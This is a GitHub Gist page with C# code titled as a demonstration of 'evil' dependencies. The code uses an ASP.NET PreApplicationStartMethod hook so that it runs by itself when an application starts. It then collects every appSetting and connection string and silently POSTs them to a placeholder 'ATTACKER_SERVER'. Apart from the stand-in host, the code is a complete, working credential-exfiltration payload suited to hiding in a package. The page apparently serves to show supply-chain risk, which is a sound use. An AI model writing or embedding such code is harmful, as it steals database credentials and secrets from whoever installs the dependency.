Last active
October 22, 2017 00:19
-
-
Save pjbgf/406835f64d217a3c0803dc54540703e4 to your computer and use it in GitHub Desktop.
Dependencies being evil: 1 - Hijacking appsettings and connectionstrings.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Configuration; | |
using System.Net.Http; | |
using System.Text; | |
using System.Threading.Tasks; | |
using System.Web; | |
using SecurityTrap.DoNotUse; | |
[assembly: PreApplicationStartMethod(typeof(EvilCode), "RogueAction")] | |
namespace SecurityTrap.DoNotUse | |
{ | |
public static class EvilCode | |
{ | |
public static void RogueAction() | |
{ | |
try | |
{ | |
var sensitiveData = new StringBuilder(); | |
foreach (var key in ConfigurationManager.AppSettings.AllKeys) | |
sensitiveData.AppendLine($"{key}:{ConfigurationManager.AppSettings[key]}"); | |
for (int i = 0; i < ConfigurationManager.ConnectionStrings.Count; i++) | |
sensitiveData.AppendLine( | |
$"{ConfigurationManager.ConnectionStrings[i].Name}:{ConfigurationManager.ConnectionStrings[i].ConnectionString}"); | |
Task.WaitAll(MakeRequest(sensitiveData.ToString())); | |
} | |
catch | |
{ | |
} | |
} | |
private static async Task<HttpResponseMessage> MakeRequest(string value) | |
{ | |
var httpClient = new HttpClient(); | |
var content = new StringContent(value); | |
return await httpClient.PostAsync(new Uri("ATTACKER_SERVER"), content); | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment